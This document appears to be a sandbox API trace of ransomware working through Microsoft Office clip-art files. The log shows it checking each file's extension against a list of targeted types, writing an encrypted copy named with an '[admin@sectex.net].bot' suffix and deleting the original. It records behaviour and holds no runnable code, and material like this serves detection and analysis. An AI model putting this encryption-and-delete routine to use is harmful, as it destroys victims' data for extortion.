	[0171.340] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.340] lstrlenW (lpString=".zip") returned 4
	[0171.340] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.340] lstrlenW (lpString=".rar") returned 4
	[0171.340] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString=".bz2") returned 4
	[0171.340] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.340] lstrlenW (lpString=".7z") returned 3
	[0171.341] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.341] lstrlenW (lpString=".dbf") returned 4
	[0171.341] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.341] lstrlenW (lpString=".1cd") returned 4
	[0171.341] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.341] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185670.WMF") returned 63
	[0171.341] lstrlenW (lpString=".jpg") returned 4
	[0171.341] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.341] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.341] lstrlenW (lpString="J0185780.WMF") returned 12
	[0171.341] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.342] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=59734) returned 1
	[0171.342] CloseHandle (hObject=0x350) returned 1
	[0171.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf")) returned 0x20
	[0171.342] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.342] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.342] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.342] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.346] GetLastError () returned 0x0
	[0171.346] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0xe956, lpOverlapped=0x0) returned 1
	[0171.348] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xe960, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xe960, lpOverlapped=0x0) returned 1
	[0171.350] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.350] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.350] SetEndOfFile (hFile=0x124) returned 1
	[0171.350] CloseHandle (hObject=0x124) returned 1
	[0171.350] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.350] SetEndOfFile (hFile=0x350) returned 1
	[0171.354] CloseHandle (hObject=0x350) returned 1
	[0171.354] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.354] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185780.wmf")) returned 1
	[0171.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.355] lstrlenW (lpString=".doc") returned 4
	[0171.355] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.355] lstrlenW (lpString=".docx") returned 5
	[0171.355] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.355] lstrlenW (lpString=".pdf") returned 4
	[0171.355] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.355] lstrlenW (lpString=".xls") returned 4
	[0171.355] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.355] lstrlenW (lpString=".xlsx") returned 5
	[0171.355] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.355] lstrlenW (lpString=".ppt") returned 4
	[0171.355] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.355] lstrlenW (lpString=".zip") returned 4
	[0171.355] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.355] lstrlenW (lpString=".rar") returned 4
	[0171.355] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.355] lstrlenW (lpString=".bz2") returned 4
	[0171.355] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.355] lstrlenW (lpString=".7z") returned 3
	[0171.355] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString=".dbf") returned 4
	[0171.356] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString=".1cd") returned 4
	[0171.356] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString=".jpg") returned 4
	[0171.356] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString=".doc") returned 4
	[0171.356] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString=".docx") returned 5
	[0171.356] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.356] lstrlenW (lpString=".pdf") returned 4
	[0171.356] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString=".xls") returned 4
	[0171.356] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.356] lstrlenW (lpString=".xlsx") returned 5
	[0171.356] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.356] lstrlenW (lpString=".ppt") returned 4
	[0171.356] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.356] lstrlenW (lpString=".zip") returned 4
	[0171.356] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.356] lstrlenW (lpString=".rar") returned 4
	[0171.356] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString=".bz2") returned 4
	[0171.356] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.356] lstrlenW (lpString=".7z") returned 3
	[0171.356] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.357] lstrlenW (lpString=".dbf") returned 4
	[0171.357] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.357] lstrlenW (lpString=".1cd") returned 4
	[0171.357] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185780.WMF") returned 63
	[0171.357] lstrlenW (lpString=".jpg") returned 4
	[0171.357] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.357] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.357] lstrlenW (lpString="J0185786.WMF") returned 12
	[0171.357] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.358] GetFileSizeEx (in: hFile=0x350, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=39330) returned 1
	[0171.358] CloseHandle (hObject=0x350) returned 1
	[0171.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf")) returned 0x20
	[0171.358] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350
	[0171.358] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.358] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124
	[0171.359] GetLastError () returned 0x0
	[0171.359] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x99a2, lpOverlapped=0x0) returned 1
	[0171.361] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x99b0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x99b0, lpOverlapped=0x0) returned 1
	[0171.363] ReadFile (in: hFile=0x350, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.363] WriteFile (in: hFile=0x124, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.363] SetEndOfFile (hFile=0x124) returned 1
	[0171.363] CloseHandle (hObject=0x124) returned 1
	[0171.363] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.363] SetEndOfFile (hFile=0x350) returned 1
	[0171.366] CloseHandle (hObject=0x350) returned 1
	[0171.366] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.505] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0185786.wmf")) returned 1
	[0171.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.546] lstrlenW (lpString=".doc") returned 4
	[0171.546] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.546] lstrlenW (lpString=".docx") returned 5
	[0171.546] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.546] lstrlenW (lpString=".pdf") returned 4
	[0171.546] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.546] lstrlenW (lpString=".xls") returned 4
	[0171.558] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.558] lstrlenW (lpString=".xlsx") returned 5
	[0171.558] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.558] lstrlenW (lpString=".ppt") returned 4
	[0171.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.558] lstrlenW (lpString=".zip") returned 4
	[0171.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.568] lstrlenW (lpString=".rar") returned 4
	[0171.568] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.568] lstrlenW (lpString=".bz2") returned 4
	[0171.568] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.568] lstrlenW (lpString=".7z") returned 3
	[0171.568] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.568] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.569] lstrlenW (lpString=".dbf") returned 4
	[0171.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.569] lstrlenW (lpString=".1cd") returned 4
	[0171.569] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.569] lstrlenW (lpString=".jpg") returned 4
	[0171.569] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.569] lstrlenW (lpString=".doc") returned 4
	[0171.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString=".docx") returned 5
	[0171.570] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0171.570] lstrlenW (lpString=".pdf") returned 4
	[0171.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString=".xls") returned 4
	[0171.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.570] lstrlenW (lpString=".xlsx") returned 5
	[0171.570] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0171.570] lstrlenW (lpString=".ppt") returned 4
	[0171.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.570] lstrlenW (lpString=".zip") returned 4
	[0171.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.570] lstrlenW (lpString=".rar") returned 4
	[0171.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString=".bz2") returned 4
	[0171.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString=".7z") returned 3
	[0171.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.570] lstrlenW (lpString=".dbf") returned 4
	[0171.570] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.570] lstrlenW (lpString=".1cd") returned 4
	[0171.570] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0185786.WMF") returned 63
	[0171.570] lstrlenW (lpString=".jpg") returned 4
	[0171.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.571] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0171.571] lstrlenW (lpString="J0186360.WMF") returned 12
	[0171.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.571] GetFileSizeEx (in: hFile=0x118, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=33850) returned 1
	[0171.571] CloseHandle (hObject=0x118) returned 1
	[0171.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf")) returned 0x20
	[0171.571] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0171.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118
	[0171.572] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.572] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380
	[0171.572] GetLastError () returned 0x0
	[0171.572] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x843a, lpOverlapped=0x0) returned 1
	[0171.575] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x8440, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x8440, lpOverlapped=0x0) returned 1
	[0171.576] ReadFile (in: hFile=0x118, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0171.576] WriteFile (in: hFile=0x380, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0171.576] SetEndOfFile (hFile=0x380) returned 1
	[0171.576] CloseHandle (hObject=0x380) returned 1
	[0171.576] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0171.577] SetEndOfFile (hFile=0x118) returned 1
	[0171.579] CloseHandle (hObject=0x118) returned 1
	[0171.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0171.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0186360.wmf")) returned 1
	[0171.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.580] lstrlenW (lpString=".doc") returned 4
	[0171.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.580] lstrlenW (lpString=".docx") returned 5
	[0171.580] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.580] lstrlenW (lpString=".pdf") returned 4
	[0171.580] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.580] lstrlenW (lpString=".xls") returned 4
	[0171.580] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.580] lstrlenW (lpString=".xlsx") returned 5
	[0171.580] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.580] lstrlenW (lpString=".ppt") returned 4
	[0171.580] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.580] lstrlenW (lpString=".zip") returned 4
	[0171.580] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.580] lstrlenW (lpString=".rar") returned 4
	[0171.580] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.580] lstrlenW (lpString=".bz2") returned 4
	[0171.580] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.580] lstrlenW (lpString=".7z") returned 3
	[0171.580] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString=".dbf") returned 4
	[0171.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString=".1cd") returned 4
	[0171.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString=".jpg") returned 4
	[0171.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString=".doc") returned 4
	[0171.581] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString=".docx") returned 5
	[0171.581] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0171.581] lstrlenW (lpString=".pdf") returned 4
	[0171.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString=".xls") returned 4
	[0171.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0171.581] lstrlenW (lpString=".xlsx") returned 5
	[0171.581] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0171.581] lstrlenW (lpString=".ppt") returned 4
	[0171.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0186360.WMF") returned 63
	[0171.581] lstrlenW (lpString=".zip") returned 4
	[0171.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0171.581] lstrlenW (lpString=".rar") returned 4
	[0171.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString=".bz2") returned 4
	[0171.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0171.581] lstrlenW (lpString=".7z") returned 3
